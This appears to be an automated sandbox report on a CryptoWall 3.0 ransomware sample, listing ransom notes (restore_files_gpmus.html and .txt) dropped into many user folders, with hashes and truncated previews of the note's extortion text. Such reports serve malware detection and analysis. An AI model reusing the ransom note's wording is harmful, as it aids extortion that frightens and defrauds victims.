                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:true
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:true
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Mozilla\Firefox\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Mozilla\Firefox\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Mozilla\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Mozilla\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Mozilla\updates\E7CF176E110C211B\updates\0\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Mozilla\updates\E7CF176E110C211B\updates\0\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Mozilla\updates\E7CF176E110C211B\updates\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
